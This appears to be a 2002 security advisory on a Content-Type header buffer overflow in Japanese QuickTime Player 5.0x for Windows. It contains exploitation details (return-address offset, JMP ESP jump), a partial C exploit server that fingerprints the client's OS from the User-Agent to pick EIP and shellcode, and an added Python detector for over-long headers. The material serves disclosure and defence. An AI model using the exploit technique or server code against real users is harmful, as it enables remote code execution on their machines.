Apple QuickTime Player "Content-Type" Buffer Overflow
9 Feb. 2002
Summary
QuickTime Player can fetch a file published on a web server and play it. The player overflows when the web server sends an HTTP response containing a long "Content-Type" header. This buffer overflow overwrites a local buffer, and the data placed there is then executed on the client host.
Credit:
The information has been provided by UNYUN.
Vulnerable systems:
* QuickTime Player 5.01 for Windows (Japanese)
* QuickTime Player 5.02 for Windows (Japanese)
Details:
QuickTime Player overflows when it connects to a web server that sends the following HTTP response:
HTTP/1.1 200 OK
Date: Wed, 06 Feb 2002 06:56:30 GMT
Server: Apache/1.3.19
Last-Modified: Tue, 15 May 2001 13:37:51 GMT
ETag: "1e001d-7b5-3b01312f"
Accept-Ranges: bytes
Content-Length: 1973
Content-Type: aaaaaaaaaaaa.. long string ..aaaaaaaaaaaaa
You can confirm the buffer overflow by specifying a long string (about 500 bytes) on the Content-Type line. The return address is stored at offset 456; if the address of a JMP ESP instruction is written to that return address, the code placed in the Content-Type buffer is executed.
You can create a "mov" file that links to the fake web server by creating the following file structure:
Furthermore, QuickTime Player places its own version and the OS version in the User-Agent header, as follows:
User-Agent: QuickTime (qtver=5.0.2;os=Windows NT 5.0Service Pack 2)
Exploit code can therefore send a return address (EIP) and egg code appropriate for the environment of the connecting client.
Avoidance:
If you use Internet Explorer, you can avoid this problem by disabling ActiveX. If you open a "mov" file with QuickTime Player, you must check the file manually for an embedded hyperlink. If a hyperlink is specified in the mov file, you must check that the "Content-Type" sent by the web server is not malicious.
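The check recommended above can be automated at a proxy or in an IDS: parse the HTTP response header block and flag a Content-Type value that is abnormally long (the advisory places the return address at offset 456 of the buffer) or that is not a well-formed media type. This is an added example, not part of the original advisory or its exploit; the threshold of 255 bytes and the sample responses are constructed for illustration.

```python
import re
from typing import Dict, List

# Threshold is an assumption: legitimate media types are a few dozen bytes,
# and the advisory's overflow needs roughly 456+ bytes to reach the return address.
MAX_CONTENT_TYPE_LEN = 255

# type/subtype built from RFC 2616 token characters, optional ";parameters"
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_MEDIA_TYPE_RE = re.compile(rf"^{_TOKEN}/{_TOKEN}(\s*;.*)?$")


def parse_response_headers(raw: bytes) -> Dict[str, str]:
    """Split an HTTP response into a header dict (names lower-cased).

    Only the header block before the blank line is parsed; the body is ignored.
    """
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # not a "Name: value" line; ignore it
        headers[name.decode("latin-1").strip().lower()] = value.decode("latin-1").strip()
    return headers


def check_content_type(raw: bytes) -> List[str]:
    """Return findings for an over-long or malformed Content-Type header."""
    ctype = parse_response_headers(raw).get("content-type")
    findings: List[str] = []
    if ctype is None:
        return findings
    if len(ctype) > MAX_CONTENT_TYPE_LEN:
        findings.append(f"Content-Type is {len(ctype)} bytes (limit {MAX_CONTENT_TYPE_LEN})")
    if not _MEDIA_TYPE_RE.match(ctype):
        findings.append("Content-Type is not a well-formed media type")
    return findings


# Constructed samples: a normal QuickTime response and one shaped like the advisory's
BENIGN = b"HTTP/1.1 200 OK\r\nContent-Length: 1973\r\nContent-Type: video/quicktime\r\n\r\n"
MALICIOUS = b"HTTP/1.1 200 OK\r\nContent-Length: 1973\r\nContent-Type: " + b"a" * 500 + b"\r\n\r\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, check_content_type(sample) or "ok")
```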
Sample code:
This code provides a TCP service on port 2222. The fake web server checks the User-Agent sent by QuickTime Player and sets the appropriate EIP and egg code (for Windows XP Home, Windows 2000 Professional and Windows 98 SE).
/*======================================================================
Apple QuickTimePlayer 5.02/5.01 Exploit
for Windows XP Home edition
Windows2000 Professional (Service Pack 2)
Windows98 Second Edition
The Shadow Penguin Security (http://www.shadowpenguin.org)
Written by UNYUN (unyun@shadowpenguin.org)
=======================================================================
*/
#include <windows.h>
#include <windowsx.h>
#include <stdio.h>
#include <winsock.h>
    // Recv request
    if ((r=recv(sock,recvbuf,sizeof(recvbuf)-1,0))==SOCKET_ERROR){
        printf("Can not recv packet\n");
        return(0);
    }
    recvbuf[r]='\0';
    printf("---request------------------------------\n");
    printf("%s\n",recvbuf);
    printf("----------------------------------------\n");
    if ((p=strstr(recvbuf,"User-Agent:"))==NULL){
        printf("Can not select\n");
        printf("%s\n",recvbuf);
        exit(1);
    }
    if ((q=strchr(p,'\r'))!=NULL) *q='\0';
    if ((qtver=strstr(p,"qtver="))==NULL){
        printf("Version is not written in User-Agent\n");
        printf("%s\n",p);
        exit(1);
    }
    qtver+=6;
    if ((q=strchr(qtver,';'))!=NULL) *q='\0';
    printf("Client version = '%s'\n",qtver);
    q++;
    if ((p=strchr(q,')'))!=NULL) *p='\0';
    if ((os=strstr(q,"os="))==NULL){
        printf("OS name is not written in User-Agent\n");
        printf("%s\n",q);
        exit(1);
    }
    os+=3;
    printf("Client OS = '%s'\n",os);
    if (!strcmp(os,UA_XPHOME)){
        eip=RETADR_XPhome;
        egg=egg_XPhome;
        printf("Target = WindowsXp Home\n");
    }else if (!strcmp(os,UA_2000PRO)){
        eip=RETADR_2000pro;
        egg=egg_2000pro;
        printf("Target = Windows2000 Professional (SP2)\n");
    }else if (!strcmp(os,UA_98SE)){
        eip=RETADR_98SE;
        egg=egg_98se;
        printf("Target = Windows98 Second Edition\n");
    }else{
        eip=RETADR_2000pro;
        egg=egg_2000pro;
        printf("Target = Unknown.\n");
    }